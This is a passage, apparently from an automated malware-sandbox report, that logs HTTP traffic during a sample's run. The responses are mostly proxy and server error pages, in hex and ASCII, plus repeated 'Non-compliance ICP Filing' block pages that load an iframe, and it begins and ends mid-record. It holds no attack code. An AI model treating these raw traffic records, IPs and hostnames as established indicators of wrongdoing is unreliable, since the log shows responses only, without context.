6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3629X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:02 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8Proxy-Authenticate: Basic realm="proxy"errorMsg: user forbidden,userip=191.96.150.227,info=insufficient floData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.22.1Date: Tue, 12 Mar 2024 07:37:03 GMTContent-Type: text/htmlContent-Length: 555Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 3629X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 